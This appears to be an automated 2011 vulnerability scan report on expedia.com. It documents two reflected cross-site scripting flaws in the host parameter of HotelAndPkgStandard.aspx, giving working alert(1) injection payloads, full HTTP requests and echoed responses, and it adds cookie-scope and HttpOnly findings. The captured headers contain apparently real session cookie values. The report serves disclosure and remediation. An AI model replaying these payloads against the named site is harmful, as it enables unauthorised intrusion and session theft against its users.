XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, expedia.com

Report generated by XSS.CX at Mon Jun 13 08:00:35 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. Cross-site scripting (reflected)

1.1. http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx [host parameter]

1.2. http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx [host parameter]

2. Cookie scoped to parent domain

2.1. http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information

2.2. http://www.expedia.com/daily/prod/xmlgrid/loadingImage.asp

2.3. http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx

2.4. http://www.expedia.com/daily/prod/xmlgrid/psf/PsfGridActivities.asp

2.5. http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp

2.6. http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp

2.7. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_staffpicks_416x366.asp

2.8. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_top10deals_nyc_308x343.asp

2.9. http://www.expedia.com/hotel.h892034.Hotel-Information

3. Cookie without HttpOnly flag set

3.1. http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information

3.2. http://www.expedia.com/daily/prod/xmlgrid/loadingImage.asp

3.3. http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx

3.4. http://www.expedia.com/daily/prod/xmlgrid/psf/PsfGridActivities.asp

3.5. http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp

3.6. http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp

3.7. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_staffpicks_416x366.asp

3.8. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_top10deals_nyc_308x343.asp

3.9. http://www.expedia.com/hotel.h892034.Hotel-Information

4. Source code disclosure

4.1. http://www.expedia.com/static/default/default/images/infosite/rating_bar.gif

4.2. http://www.expedia.com/static/default/default/images/infosite/videoPlayLarge.gif

4.3. http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png

4.4. http://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png

5. Referer-dependent response

6. Cross-domain Referer leakage

6.1. http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information

6.2. http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp

6.3. http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp

6.4. http://www.expedia.com/static/default/default/scripts/exp/core/ChannelTracking.js

7. Cross-domain script include

8. HTML does not specify charset

8.1. http://www.expedia.com/daily/prod/xmlgrid/loadingImage.asp

8.2. http://www.expedia.com/daily/prod/xmlgrid/psf/PsfGridActivities.asp

8.3. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_staffpicks_416x366.asp

8.4. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_top10deals_nyc_308x343.asp

9. Content type incorrectly stated

9.1. http://www.expedia.com/daily/js/flash.vbs

9.2. http://www.expedia.com/daily/prod/xmlgrid/psf/PsfGridActivities.asp

10. Content type is not specified

10.1. http://www.expedia.com/static/default/default/images/close_button.gif

10.2. http://www.expedia.com/static/default/default/images/infosite/hotel_detail_rating_bar.gif

10.3. http://www.expedia.com/static/default/default/images/infosite/icn_quote_beak_down.gif

10.4. http://www.expedia.com/static/default/default/images/infosite/icn_quote_beak_up.gif

10.5. http://www.expedia.com/static/default/default/images/infosite/rating_bar.gif

10.6. http://www.expedia.com/static/default/default/images/infosite/videoPlayLarge.gif

10.7. http://www.expedia.com/static/fusion/v2.3/images/buttonBG.png

10.8. http://www.expedia.com/static/fusion/v2.3/images/container/module-borders-sprite-alpha.png

10.9. http://www.expedia.com/static/fusion/v2.3/images/iconsSprites.png



1. Cross-site scripting (reflected)  next
There are 2 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx [host parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx

Issue detail

The value of the host request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f98cb"style%3d"x%3aexpression(alert(1))"c39c924f1aa was submitted in the host parameter. This input was echoed as f98cb"style="x:expression(alert(1))"c39c924f1aa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx?&lob=hotels&region=7923&sort=&filter=&dest=New%20York%20City%20(Manhattan),%20NY&ps=25&host=www.expedia.comf98cb"style%3d"x%3aexpression(alert(1))"c39c924f1aa HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp?tab=0&dest=New%20York%20City%20(Manhattan),%20NY&mcicid=ssdestdeal2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
X-AspNet-Version: 2.0.50727
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
ntCoent-Length: 101669
Expires: Sat, 11 Dec 2010 18:02:39 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:28:44 GMT
Content-Length: 101669
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSRT1=bPT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:28:44 GMT


<html xmlns="http://www.w3.org/1999/xhtml">


<script type="text/javascript" language="Javascript">
function sendData()
{
   try
   {
       var f = (navigator.userAgent.indexOf("Firefox") > 0) ? 4
...[SNIP]...
<a href="http://www.expedia.comf98cb"style="x:expression(alert(1))"c39c924f1aa/hotel.h892034.Hotel-Information?chkin=7/14/2011&amp;chkout=7/18/2011&amp;rm1=a2&amp;hashTag=default&mcicid=112321680" target="_top">
...[SNIP]...

1.2. http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx [host parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx

Issue detail

The value of the host request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a6604'%3balert(1)//7ea722c2105 was submitted in the host parameter. This input was echoed as a6604';alert(1)//7ea722c2105 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx?&lob=hotels&region=7923&sort=&filter=&dest=New%20York%20City%20(Manhattan),%20NY&ps=25&host=www.expedia.coma6604'%3balert(1)//7ea722c2105 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp?tab=0&dest=New%20York%20City%20(Manhattan),%20NY&mcicid=ssdestdeal2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
X-AspNet-Version: 2.0.50727
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
ntCoent-Length: 101095
Expires: Sat, 11 Dec 2010 18:02:13 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:28:47 GMT
Content-Length: 101095
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSRT1=bvT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:28:46 GMT


<html xmlns="http://www.w3.org/1999/xhtml">


<script type="text/javascript" language="Javascript">
function sendData()
{
   try
   {
       var f = (navigator.userAgent.indexOf("Firefox") > 0) ? 4
...[SNIP]...
value;
       var p2 = document.getElementById('ctl00_MainContent_hdnPrice2').value;
       var loc = getLocation();

       var id = 'proxyframe';
       var proxy = frames[id];
       var host = 'http://www.expedia.coma6604';alert(1)//7ea722c2105';
       host = (host == 'http://') ? 'http://www.expedia.com' : host;
       var url = host + '/daily/common/xmlgrid_proxy.html?height=' + h + '&price1=' + p1 + '&price2=' + p2 + '&location=' + loc;
       if(pr
...[SNIP]...

2. Cookie scoped to parent domain  previous  next
There are 9 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


2.1. http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx?&lob=hotels&region=7923&sort=&filter=&dest=New%20York%20City%20(Manhattan),%20NY&ps=25&host=www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; ipsnf3=v.3|US|1|511|washington; SSLB=1; SSRT1=yvL1TQE; iEAPID=0000,

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 11 Dec 2010 18:03:04 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:27:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.expedia.com
Set-Cookie: SSRT1=E_T1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:15 GMT
Set-Cookie: JSESSION=ed77ff0b-ce9e-439e-a470-a8216bfecaab; Domain=.expedia.com; Path=/
Set-Cookie: s1=`0; Domain=.expedia.com; Path=/
Set-Cookie: p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; Domain=.expedia.com; Expires=Sun, 12-Jun-2016 16:31:10 GMT; Path=/
Content-Length: 536572

<!DOCTYPE html>
<html xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
   <head>
       <meta name="language" content="en_US"/>
<meta name="robots" con
...[SNIP]...

2.2. http://www.expedia.com/daily/prod/xmlgrid/loadingImage.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/prod/xmlgrid/loadingImage.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /daily/prod/xmlgrid/loadingImage.asp HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp?tab=0&dest=New%20York%20City%20(Manhattan),%20NY&mcicid=ssdestdeal2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; bn_u=5368708931696218534; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 163
Content-Type: text/html
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Length: 163
Expires: Sat, 11 Dec 2010 18:02:39 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:27:08 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSRT1=DPT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:08 GMT


<div style="text-align:center;padding:40px;">Loading deals...<br/><img src="http://www.expedia.com/eta/nocache/stampa.gif" alt="" WIDTH="82" HEIGHT="10"/></div>

2.3. http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx?&lob=hotels&region=7923&sort=&filter=&dest=New%20York%20City%20(Manhattan),%20NY&ps=25&host=www.expedia.com HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp?tab=0&dest=New%20York%20City%20(Manhattan),%20NY&mcicid=ssdestdeal2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
X-AspNet-Version: 2.0.50727
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
ntCoent-Length: 100249
Expires: Sat, 11 Dec 2010 18:02:13 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:27:11 GMT
Content-Length: 100249
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSRT1=DvT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:10 GMT


<html xmlns="http://www.w3.org/1999/xhtml">


<script type="text/javascript" language="Javascript">
function sendData()
{
   try
   {
       var f = (navigator.userAgent.indexOf("Firefox") > 0) ? 4
...[SNIP]...

2.4. http://www.expedia.com/daily/prod/xmlgrid/psf/PsfGridActivities.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/prod/xmlgrid/psf/PsfGridActivities.asp

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /daily/prod/xmlgrid/psf/PsfGridActivities.asp?dest=New%20York%20City&promo=summersale2011&r=0.3934101234190166 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp?tab=0&dest=New%20York%20City%20(Manhattan),%20NY&mcicid=ssdestdeal2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
ntCoent-Length: 1112
Content-Type: text/html
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Length: 1112
Expires: Sat, 11 Dec 2010 18:02:13 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:27:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSLB=1; path=/; domain=.expedia.com
Set-Cookie: SSRT1=EPT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:12 GMT
Set-Cookie: ipsnf3=v.3|US|1|511|washington; expires=Wed, 13-Jun-2012 00:00:01 GMT; path=/; domain=.expedia.com;

<?xml version="1.0"?>
<div class="morewaysCustomTop"></div><div class="morewaysCustom"><div class="morewaysCustomInner"><div class="activityTitle">New York City Activities</div><div class="activityDe
...[SNIP]...

2.5. http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/promos/deals/summervacationsale/default.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982003&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964003240&bpp=7&shv=r20110608&jsv=r20110607&correlator=1307964003248&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=997306818&ga_fc=1&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1065&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2F&fu=0&ifi=1&dtd=21&xpc=5g2L9BvBMy&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID1=AwCDeikAAAAA5ufnTf9NBgHm5-dNAQDm5-dNAAAAAAAAAADm5-dNAQAnAAAA-gQAAAI; MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; SSRT1=5-fnTQE; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; aspp=v.1,0|buttons-meta.microsoft.farecast.buttons.flight.homepage.|||||||||OLA|20110702|; aspp=v.1,0|buttons-meta.microsoft.farecast.buttons.flight.homepage.|||||||||OLA|20110702|; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; bn_u=5368708931696218534

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 71777
Content-Type: text/html; Charset=iso-8859-1
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 11 Dec 2010 18:02:13 GMT
Pragma: no-cache
Vary: Accept-Encoding
RTSS: 1
Content-Length: 71998
Date: Mon, 13 Jun 2011 11:26:51 GMT
Connection: close
